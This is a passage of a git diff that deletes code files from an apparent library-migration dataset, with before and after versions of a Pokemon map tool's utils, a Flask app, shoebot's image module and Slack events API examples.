for more options', default='en') - parser.add_argument('-c', '--china', help='Coordinates transformer for China', action='store_true') - parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true') - parser.add_argument('-m', '--mock', help='Mock mode. Starts the web server but not the background thread.', action='store_true', default=False) - parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False, dest='no_server') - parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False, dest='only_server') - parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False, dest='fixed_location') - parser.add_argument('-k', '--google-maps-key', help='Google Maps Javascript API Key', default=None, dest='gmaps_key') - parser.add_argument('-C', '--cors', help='Enable CORS on web server', action='store_true', default=False) - parser.add_argument('-D', '--db', help='Database filename', default='pogom.db') - parser.add_argument('-t', '--threads', help='Number of search threads', required=False, type=int, default=DEFAULT_THREADS, dest='num_threads') - parser.add_argument('-np', '--no-pokemon', help='Disables Pokemon from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-ng', '--no-gyms', help='Disables Gyms from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-nk', '--no-pokestops', help='Disables PokeStops from the map (including parsing them into local db)', action='store_true', default=False) - parser.set_defaults(DEBUG=False) - args = parser.parse_args() - - args = parse_db_config(args) - - if (args.settings): - args = parse_config(args) - else: - if args.only_server: - if args.location is None: - parser.print_usage() - print sys.argv[0] + ': error: arguments -l/--location is required' - sys.exit(1); - else: - if (args.username is None or args.location is None or args.step_limit is None): - parser.print_usage() - print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' - sys.exit(1); - - if config["PASSWORD"] is None and args.password is None: - config["PASSWORD"] = args.password = getpass.getpass() - elif args.password is None: - args.password = config["PASSWORD"] - - - return args - -def insert_mock_data(): - num_pokemon = 6 - num_pokestop = 6 - num_gym = 6 - - from .models import Pokemon, Pokestop, Gym - from .search import generate_location_steps - - latitude, longitude = float(config['ORIGINAL_LATITUDE']), float(config['ORIGINAL_LONGITUDE']) - - locations = [l for l in generate_location_steps((latitude, longitude), num_pokemon)] - disappear_time = datetime.now() + timedelta(hours=1) - - detect_time = datetime.now() - - for i in xrange(num_pokemon): - Pokemon.create(encounter_id=uuid.uuid4(), - spawnpoint_id='sp{}'.format(i), - pokemon_id=(i+1) % 150, - latitude=locations[i][0], - longitude=locations[i][1], - disappear_time=disappear_time, - detect_time=detect_time) - - for i in range(num_pokestop): - - Pokestop.create(pokestop_id=uuid.uuid4(), - enabled=True, - latitude=locations[i+num_pokemon][0], - longitude=locations[i+num_pokemon][1], - last_modified=datetime.now(), - #Every other pokestop be lured - lure_expiration=disappear_time if (i % 2 == 0) else None, - active_pokemon_id=i - ) - - for i in range(num_gym): - Gym.create(gym_id=uuid.uuid4(), - team_id=i % 3, - guard_pokemon_id=(i+1) % 150, - latitude=locations[i + num_pokemon + num_pokestop][0], - longitude=locations[i + num_pokemon + num_pokestop][1], - last_modified=datetime.now(), - enabled=True, - gym_points=1000 - ) - -def get_pokemon_name(pokemon_id): - if not hasattr(get_pokemon_name, 'names'): - file_path = os.path.join( - config['ROOT_PATH'], - config['LOCALES_DIR'], - 'pokemon.{}.json'.format(config['LOCALE'])) - - with open(file_path, 'r') as f: - get_pokemon_name.names = json.loads(f.read()) - - return get_pokemon_name.names[str(pokemon_id)] - -def load_credentials(filepath): - verify_config_file_exists('../config/credentials.json') - try: - with open(filepath+os.path.sep+'/config/credentials.json') as file: - creds = json.load(file) - except IOError: - creds = {} - if not creds.get('gmaps_key'): - raise APIKeyException(\ - "No Google Maps Javascript API key entered in \config\credentials.json file!" - " Please take a look at the wiki for instructions on how to generate this key," - " then add that key to the file!") - return creds diff --git a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py b/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py deleted file mode 100644 index bd53c24..0000000 --- a/v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- - -import sys -import getpass -import configargparse -import re -import uuid -import os -import json -from datetime import datetime, timedelta -import platform -import logging -import shutil - -from . import config - -logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s') -log = logging.getLogger(__name__) - -def parse_unicode(bytestring): - decoded_string = bytestring.decode(sys.getfilesystemencoding()) - return decoded_string - -def verify_config_file_exists(filename): - fullpath = os.path.join(os.path.dirname(__file__), filename) - if os.path.exists(fullpath) is False: - log.info("Could not find " + filename + ", copying default") - shutil.copy2(fullpath + '.example', fullpath) - -def get_args(): - # fuck PEP8 - parser = configargparse.ArgParser(default_config_files=['config/config.ini']) - parser.add_argument('-a', '--auth-service', type=str.lower, help='Auth Service', default='ptc') - parser.add_argument('-u', '--username', help='Username') - parser.add_argument('-p', '--password', help='Password') - parser.add_argument('-l', '--location', type=parse_unicode, help='Location, can be an address or coordinates') - parser.add_argument('-st', '--step-limit', help='Steps', type=int, default=12) - parser.add_argument('-sd', '--scan-delay', help='Time delay before beginning new scan', type=int, default=1) - parser.add_argument('-dc', '--display-in-console',help='Display Found Pokemon in Console',action='store_true', default=False) - parser.add_argument('-H', '--host', help='Set web server listening host', default='127.0.0.1') - parser.add_argument('-P', '--port', type=int, help='Set web server listening port', default=5000) - parser.add_argument('-L', '--locale', help='Locale for Pokemon names: default en, check locale folder for more options', default='en') - parser.add_argument('-c', '--china', help='Coordinates transformer for China', action='store_true') - parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true') - parser.add_argument('-m', '--mock', help='Mock mode. Starts the web server but not the background thread.', action='store_true', default=False) - parser.add_argument('-ns', '--no-server', help='No-Server Mode. Starts the searcher but not the Webserver.', action='store_true', default=False) - parser.add_argument('-os', '--only-server', help='Server-Only Mode. Starts only the Webserver without the searcher.', action='store_true', default=False) - parser.add_argument('-fl', '--fixed-location', help='Hides the search bar for use in shared maps.', action='store_true', default=False) - parser.add_argument('-k', '--gmaps-key', help='Google Maps Javascript API Key', required=True) - parser.add_argument('-C', '--cors', help='Enable CORS on web server', action='store_true', default=False) - parser.add_argument('-D', '--db', help='Database filename', default='pogom.db') - parser.add_argument('-t', '--num-threads', help='Number of search threads', type=int, default=1) - parser.add_argument('-np', '--no-pokemon', help='Disables Pokemon from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-ng', '--no-gyms', help='Disables Gyms from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('-nk', '--no-pokestops', help='Disables PokeStops from the map (including parsing them into local db)', action='store_true', default=False) - parser.add_argument('--db-type', help='Type of database to be used (default: sqlite)', default='sqlite') - parser.add_argument('--db-name', help='Name of the database to be used') - parser.add_argument('--db-user', help='Username for the database') - parser.add_argument('--db-pass', help='Password for the database') - parser.add_argument('--db-host', help='IP or hostname for the database') - parser.set_defaults(DEBUG=False) - - args = parser.parse_args() - - if args.only_server: - if args.location is None: - parser.print_usage() - print sys.argv[0] + ': error: arguments -l/--location is required' - sys.exit(1); - else: - if (args.username is None or args.location is None or args.step_limit is None): - parser.print_usage() - print sys.argv[0] + ': error: arguments -u/--username, -l/--location, -st/--step-limit are required' - sys.exit(1); - - if config["PASSWORD"] is None and args.password is None: - config["PASSWORD"] = args.password = getpass.getpass() - elif args.password is None: - args.password = config["PASSWORD"] - - return args - -def insert_mock_data(): - num_pokemon = 6 - num_pokestop = 6 - num_gym = 6 - - from .models import Pokemon, Pokestop, Gym - from .search import generate_location_steps - - latitude, longitude = float(config['ORIGINAL_LATITUDE']), float(config['ORIGINAL_LONGITUDE']) - - locations = [l for l in generate_location_steps((latitude, longitude), num_pokemon)] - disappear_time = datetime.now() + timedelta(hours=1) - - detect_time = datetime.now() - - for i in xrange(num_pokemon): - Pokemon.create(encounter_id=uuid.uuid4(), - spawnpoint_id='sp{}'.format(i), - pokemon_id=(i+1) % 150, - latitude=locations[i][0], - longitude=locations[i][1], - disappear_time=disappear_time, - detect_time=detect_time) - - for i in range(num_pokestop): - - Pokestop.create(pokestop_id=uuid.uuid4(), - enabled=True, - latitude=locations[i+num_pokemon][0], - longitude=locations[i+num_pokemon][1], - last_modified=datetime.now(), - #Every other pokestop be lured - lure_expiration=disappear_time if (i % 2 == 0) else None, - active_pokemon_id=i - ) - - for i in range(num_gym): - Gym.create(gym_id=uuid.uuid4(), - team_id=i % 3, - guard_pokemon_id=(i+1) % 150, - latitude=locations[i + num_pokemon + num_pokestop][0], - longitude=locations[i + num_pokemon + num_pokestop][1], - last_modified=datetime.now(), - enabled=True, - gym_points=1000 - ) - -def get_pokemon_name(pokemon_id): - if not hasattr(get_pokemon_name, 'names'): - file_path = os.path.join( - config['ROOT_PATH'], - config['LOCALES_DIR'], - 'pokemon.{}.json'.format(config['LOCALE'])) - - with open(file_path, 'r') as f: - get_pokemon_name.names = json.loads(f.read()) - - return get_pokemon_name.names[str(pokemon_id)] diff --git a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff b/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff deleted file mode 100644 index 170af99..0000000 --- a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/pyfront/app/__init__.py b/pyfront/app/__init__.py - index 4fbdcfced750d60cb3587fb81add23e8b34eb777..a7375ccc40885f04faf4a05852591e6de4ba676d 100644 - --- a/pyfront/app/__init__.py - +++ b/pyfront/app/__init__.py -@@ -1,17 +1,23 @@ - from flask import Flask --from celery import Celery --from pathlib import Path --import sys --import os -+from redis import Redis -+import rq -+from config import Config - --app = Flask(__name__, template_folder="views") - --queue = Celery('tasks', backend='amqp', broker='ampq://') -- --@queue.task - def runDetecting(): - import services.docker_handlers as dc - dc.runDockerContainer("sapfir0/premier-eye") - - --from app import routes -\ No newline at end of file -+def createApp(configClass=Config): -+ app = Flask(__name__, template_folder="views") # это экспортируем -+ print(app.config) -+ app.config.from_object(configClass) -+ -+ from app.errors import bp as errorsBP -+ app.register_blueprint(errorsBP) -+ -+ from app.main import bp as mainBP -+ app.register_blueprint(mainBP) -+ return app -+ diff --git a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py b/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py deleted file mode 100644 index b0677e3..0000000 --- a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py +++ /dev/null @@ -1,17 +0,0 @@ -from flask import Flask -from celery import Celery -from pathlib import Path -import sys -import os - -app = Flask(__name__, template_folder="views") - -queue = Celery('tasks', backend='amqp', broker='ampq://') - -@queue.task -def runDetecting(): - import services.docker_handlers as dc - dc.runDockerContainer("sapfir0/premier-eye") - - -from app import routes \ No newline at end of file diff --git a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py b/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py deleted file mode 100644 index 54920c1..0000000 --- a/v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py +++ /dev/null @@ -1,23 +0,0 @@ -from flask import Flask -from redis import Redis -import rq -from config import Config - - -def runDetecting(): - import services.docker_handlers as dc - dc.runDockerContainer("sapfir0/premier-eye") - - -def createApp(configClass=Config): - app = Flask(__name__, template_folder="views") # это экспортируем - print(app.config) - app.config.from_object(configClass) - - from app.errors import bp as errorsBP - app.register_blueprint(errorsBP) - - from app.main import bp as mainBP - app.register_blueprint(mainBP) - return app - diff --git a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff b/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff deleted file mode 100644 index 5c95235..0000000 --- a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/shoebot/data/img.py b/shoebot/data/img.py - index 478ec15034ec6954cec0da6639ded9e3010f2eb7..0171fb9ff6ed2fed71dcfe82eef7ca723d609fcf 100644 - --- a/shoebot/data/img.py - +++ b/shoebot/data/img.py -@@ -6,7 +6,7 @@ import os.path - from sys import platform - - import cairo --import Image as PILImage -+from PIL import Image as PILImage - import gtk - - if platform != 'darwin': diff --git a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py b/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py deleted file mode 100644 index 0ffc8d9..0000000 --- a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py +++ /dev/null @@ -1,138 +0,0 @@ -from shoebot.data import _copy_attrs - -import array -from StringIO import StringIO -import os.path -from sys import platform - -import cairo -import Image as PILImage -import gtk - -if platform != 'darwin': - import rsvg - -from shoebot.data import Grob, ColorMixin -from shoebot.util import RecordingSurface - -CENTER = 'center' -CORNER = 'corner' - -class Image(Grob, ColorMixin): - _surface_cache = {} # {filename: width, height, imagesurface} - - def __init__(self, bot, path = None, x = 0, y = 0, width=None, height=None, alpha=1.0, data=None, pathmode=CORNER, **kwargs): - Grob.__init__(self, bot) - ColorMixin.__init__(self, **kwargs) - - self.x = x - self.y = y - self.width = width - self.height = height - self.alpha = alpha - self.path = path - self.data = data - self._pathmode = pathmode - sh = sw = None # Surface Height and Width - - if isinstance(self.data, cairo.ImageSurface): - sw = self.data.get_width() - sh = self.data.get_height() - self._imagesurface = self.data - else: - # checks if image data is passed in command call, in this case it wraps - # the data in a StringIO oject in order to use it as a file - # the data itself must contain an entire image, not just pixel data - # it can be useful for example to retrieve images from the web without - # writing temp files (e.g. using nodebox's web library, see example 1 of the library) - # if no data is passed the path is used to open a local file - if self.data is None: - if path in self._surface_cache: - sw, sh, imagesurface = self._surface_cache[path] - elif os.path.splitext(path)[1].lower() == '.svg': - handle = rsvg.Handle(path) - sw, sh = handle.get_dimension_data()[:2] - imagesurface = RecordingSurface(sw, sh) - ctx = cairo.Context(imagesurface) - handle.render_cairo(ctx) - elif os.path.splitext(path)[1].lower() == '.png': - imagesurface = cairo.ImageSurface.create_from_png(path) - sw = imagesurface.get_width() - sh = imagesurface.get_height() - else: - pixbuf = gtk.gdk.pixbuf_new_from_file(path) - sw = pixbuf.get_width() - sh = pixbuf.get_height() - - ''' create a new cairo surface to place the image on ''' - surface = cairo.ImageSurface(0, sw, sh) - ''' create a context to the new surface ''' - ct = cairo.Context(surface) - ''' create a GDK formatted Cairo context to the new Cairo native context ''' - ct2 = gtk.gdk.CairoContext(ct) - ''' draw from the pixbuf to the new surface ''' - ct2.set_source_pixbuf(pixbuf, 0, 0) - ct2.paint() - ''' surface now contains the image in a Cairo surface ''' - imagesurface = ct2.get_target() - self._surface_cache[path] = sw, sh, imagesurface - else: - img = PILImage.open(StringIO(self.data)) - - if img.mode != 'RGBA': - img = img.convert("RGBA") - - sw, sh = img.size - # Would be nice to not have to do some of these conversions :-\ - bgra_data = img.tostring('raw', 'BGRA', 0, 1) - bgra_array = array.array('B', bgra_data) - imagesurface = cairo.ImageSurface.create_for_data(bgra_array, cairo.FORMAT_ARGB32, sw, sh, sw*4) - - if width is not None or height is not None: - if width: - wscale = float(width) / sw - else: - wscale = 1.0 - if height: - hscale = float(height) / sh - else: - if width: - hscale = wscale - else: - hscale = 1.0 - self._transform.scale(wscale, hscale) - - self.width = width or sw - self.height = height or sh - self._imagesurface = imagesurface - - self._deferred_render() - - - def _render(self, ctx): - if self.width and self.height: - # Go to initial point (CORNER or CENTER): - transform = self._call_transform_mode(self._transform) - - ctx.set_matrix(self._transform) - ctx.translate(self.x, self.y) - ctx.set_source_surface(self._imagesurface) - ctx.paint() - - def draw(self): - self._deferred_render() - - def _get_center(self): - '''Returns the center point of the path, disregarding transforms. - ''' - x = (self.x+self.width/2) - y = (self.y+self.height/2) - return (x,y) - center = property(_get_center) - - def copy(self): - p = self.__class__(self._bot, self.path, self.x, self.y, self.width, self.height) - _copy_attrs(self._bot, p, self.stateAttributes) - return p - - diff --git a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py b/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py deleted file mode 100644 index 103c478..0000000 --- a/v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py +++ /dev/null @@ -1,138 +0,0 @@ -from shoebot.data import _copy_attrs - -import array -from StringIO import StringIO -import os.path -from sys import platform - -import cairo -from PIL import Image as PILImage -import gtk - -if platform != 'darwin': - import rsvg - -from shoebot.data import Grob, ColorMixin -from shoebot.util import RecordingSurface - -CENTER = 'center' -CORNER = 'corner' - -class Image(Grob, ColorMixin): - _surface_cache = {} # {filename: width, height, imagesurface} - - def __init__(self, bot, path = None, x = 0, y = 0, width=None, height=None, alpha=1.0, data=None, pathmode=CORNER, **kwargs): - Grob.__init__(self, bot) - ColorMixin.__init__(self, **kwargs) - - self.x = x - self.y = y - self.width = width - self.height = height - self.alpha = alpha - self.path = path - self.data = data - self._pathmode = pathmode - sh = sw = None # Surface Height and Width - - if isinstance(self.data, cairo.ImageSurface): - sw = self.data.get_width() - sh = self.data.get_height() - self._imagesurface = self.data - else: - # checks if image data is passed in command call, in this case it wraps - # the data in a StringIO oject in order to use it as a file - # the data itself must contain an entire image, not just pixel data - # it can be useful for example to retrieve images from the web without - # writing temp files (e.g. using nodebox's web library, see example 1 of the library) - # if no data is passed the path is used to open a local file - if self.data is None: - if path in self._surface_cache: - sw, sh, imagesurface = self._surface_cache[path] - elif os.path.splitext(path)[1].lower() == '.svg': - handle = rsvg.Handle(path) - sw, sh = handle.get_dimension_data()[:2] - imagesurface = RecordingSurface(sw, sh) - ctx = cairo.Context(imagesurface) - handle.render_cairo(ctx) - elif os.path.splitext(path)[1].lower() == '.png': - imagesurface = cairo.ImageSurface.create_from_png(path) - sw = imagesurface.get_width() - sh = imagesurface.get_height() - else: - pixbuf = gtk.gdk.pixbuf_new_from_file(path) - sw = pixbuf.get_width() - sh = pixbuf.get_height() - - ''' create a new cairo surface to place the image on ''' - surface = cairo.ImageSurface(0, sw, sh) - ''' create a context to the new surface ''' - ct = cairo.Context(surface) - ''' create a GDK formatted Cairo context to the new Cairo native context ''' - ct2 = gtk.gdk.CairoContext(ct) - ''' draw from the pixbuf to the new surface ''' - ct2.set_source_pixbuf(pixbuf, 0, 0) - ct2.paint() - ''' surface now contains the image in a Cairo surface ''' - imagesurface = ct2.get_target() - self._surface_cache[path] = sw, sh, imagesurface - else: - img = PILImage.open(StringIO(self.data)) - - if img.mode != 'RGBA': - img = img.convert("RGBA") - - sw, sh = img.size - # Would be nice to not have to do some of these conversions :-\ - bgra_data = img.tostring('raw', 'BGRA', 0, 1) - bgra_array = array.array('B', bgra_data) - imagesurface = cairo.ImageSurface.create_for_data(bgra_array, cairo.FORMAT_ARGB32, sw, sh, sw*4) - - if width is not None or height is not None: - if width: - wscale = float(width) / sw - else: - wscale = 1.0 - if height: - hscale = float(height) / sh - else: - if width: - hscale = wscale - else: - hscale = 1.0 - self._transform.scale(wscale, hscale) - - self.width = width or sw - self.height = height or sh - self._imagesurface = imagesurface - - self._deferred_render() - - - def _render(self, ctx): - if self.width and self.height: - # Go to initial point (CORNER or CENTER): - transform = self._call_transform_mode(self._transform) - - ctx.set_matrix(self._transform) - ctx.translate(self.x, self.y) - ctx.set_source_surface(self._imagesurface) - ctx.paint() - - def draw(self): - self._deferred_render() - - def _get_center(self): - '''Returns the center point of the path, disregarding transforms. - ''' - x = (self.x+self.width/2) - y = (self.y+self.height/2) - return (x,y) - center = property(_get_center) - - def copy(self): - p = self.__class__(self._bot, self.path, self.x, self.y, self.width, self.height) - _copy_attrs(self._bot, p, self.stateAttributes) - return p - - diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff deleted file mode 100644 index 81a2e40..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/example/blueprint/example.py b/example/blueprint/example.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/blueprint/example.py - +++ b/example/blueprint/example.py -@@ -1,15 +1,5 @@ --# ------------------ --# Only for running this script here --import logging --import sys --from os.path import dirname -- --sys.path.insert(1, f"{dirname(__file__)}/../..") --logging.basicConfig(level=logging.DEBUG) --# ------------------ -- - from slackeventsapi import SlackEventAdapter --from slack import WebClient -+from slack_sdk.web import WebClient - import os - - from flask import Flask, Blueprint -@@ -23,6 +13,16 @@ slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events", - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - -+# Example responder to bot mentions -+@slack_events_adapter.on("app_mention") -+def handle_mentions(event_data): -+ event = event_data["event"] -+ slack_client.chat_postMessage( -+ channel=event["channel"], -+ text=f"You said:\n>{event['text']}", -+ ) -+ -+ - # Example responder to greetings - @slack_events_adapter.on("message") - def handle_message(event_data): diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py deleted file mode 100644 index c2d5ca7..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py +++ /dev/null @@ -1,55 +0,0 @@ -# ------------------ -# Only for running this script here -import logging -import sys -from os.path import dirname - -sys.path.insert(1, f"{dirname(__file__)}/../..") -logging.basicConfig(level=logging.DEBUG) -# ------------------ - -from slackeventsapi import SlackEventAdapter -from slack import WebClient -import os - -from flask import Flask, Blueprint -slack_events = Blueprint('slack_events', __name__) - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events", slack_events) - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - - -app = Flask(__name__) -app.register_blueprint(slack_events) - -# FLASK_APP=example.py FLASK_ENV=development flask run --port 3000 \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py deleted file mode 100644 index 445fd83..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py +++ /dev/null @@ -1,55 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack_sdk.web import WebClient -import os - -from flask import Flask, Blueprint -slack_events = Blueprint('slack_events', __name__) - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events", slack_events) - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to bot mentions -@slack_events_adapter.on("app_mention") -def handle_mentions(event_data): - event = event_data["event"] - slack_client.chat_postMessage( - channel=event["channel"], - text=f"You said:\n>{event['text']}", - ) - - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - - -app = Flask(__name__) -app.register_blueprint(slack_events) - -# FLASK_APP=example.py FLASK_ENV=development flask run --port 3000 \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff deleted file mode 100644 index 16ba09c..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff +++ /dev/null @@ -1,18 +0,0 @@ -diff --git a/example/current_app/main.py b/example/current_app/main.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/current_app/main.py - +++ b/example/current_app/main.py -@@ -1,12 +1,5 @@ --# ------------------ --# Only for running this script here --import sys --from os.path import dirname --sys.path.insert(1, f"{dirname(__file__)}/../..") --# ------------------ -- - import os --from slack import WebClient -+from slack_sdk.web import WebClient - import logging - logging.basicConfig(level=logging.DEBUG) - diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py deleted file mode 100644 index 9fcd32c..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py +++ /dev/null @@ -1,49 +0,0 @@ -# ------------------ -# Only for running this script here -import sys -from os.path import dirname -sys.path.insert(1, f"{dirname(__file__)}/../..") -# ------------------ - -import os -from slack import WebClient -import logging -logging.basicConfig(level=logging.DEBUG) - -from flask import Flask - -app = Flask(__name__) - -with app.app_context(): - from test_module.slack_app import slack_events_adapter - - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - - - @slack_events_adapter.on("message") - def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hi <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - - @slack_events_adapter.on("error") - def error_handler(err): - print("ERROR: " + str(err)) - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ cd example/current_app -# (env) $ FLASK_APP=main.py FLASK_ENV=development flask run --port 3000 - -# (Terminal B) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py deleted file mode 100644 index 4094e08..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py +++ /dev/null @@ -1,42 +0,0 @@ -import os -from slack_sdk.web import WebClient -import logging -logging.basicConfig(level=logging.DEBUG) - -from flask import Flask - -app = Flask(__name__) - -with app.app_context(): - from test_module.slack_app import slack_events_adapter - - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - - - @slack_events_adapter.on("message") - def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hi <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - - @slack_events_adapter.on("error") - def error_handler(err): - print("ERROR: " + str(err)) - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ cd example/current_app -# (env) $ FLASK_APP=main.py FLASK_ENV=development flask run --port 3000 - -# (Terminal B) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff deleted file mode 100644 index eaaf9a9..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff +++ /dev/null @@ -1,28 +0,0 @@ -diff --git a/example/example.py b/example/example.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/example.py - +++ b/example/example.py -@@ -1,5 +1,5 @@ - from slackeventsapi import SlackEventAdapter --from slack import WebClient -+from slack_sdk.web import WebClient - import os - - # Our app's Slack Event Adapter for receiving actions via the Events API -@@ -10,6 +10,16 @@ slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - -+# Example responder to bot mentions -+@slack_events_adapter.on("app_mention") -+def handle_mentions(event_data): -+ event = event_data["event"] -+ slack_client.chat_postMessage( -+ channel=event["channel"], -+ text=f"You said:\n>{event['text']}", -+ ) -+ -+ - # Example responder to greetings - 